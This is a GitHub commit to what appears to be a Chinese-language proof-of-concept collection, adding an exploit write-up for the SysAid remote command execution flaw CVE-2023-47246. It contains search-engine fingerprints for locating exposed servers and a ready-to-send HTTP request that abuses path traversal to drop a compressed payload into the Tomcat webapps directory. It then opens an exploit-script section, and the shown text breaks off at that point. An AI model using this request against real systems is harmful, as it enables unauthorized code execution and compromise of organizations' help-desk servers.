Update SysAid远程命令执行漏洞(CVE-2023-47246).md

This commit is contained in:
wy876 2023-12-26 19:52:59 +08:00 committed by GitHub
parent 52bc275f0c
commit 13b5cb8f90
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -10,6 +10,24 @@ shodanhttp.favicon.hash:1540720428
zoomeyeapp:"SysAid On-Prem Software"
hunter.howfavicon_hash="5f30870725d650d7377a134c74f41cfd"
```
## poc
```
POST /userentry?accountId=/../../../tomcat/webapps/UIHM3/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
xœðffa``à`H­*ç©«¿Áä±
```
![fb5ab4bdde18a3c8f92a3c0d5d2b23c9](https://github.com/wy876/POC/assets/139549762/f0e899f9-0d0f-4bda-9b1b-8d6f3151d290)
![3dad5ed7f4a321562ad6c74ee9a9edf1](https://github.com/wy876/POC/assets/139549762/1b81f98e-2599-4622-8c24-c2543a543544)
## Exp脚本
```python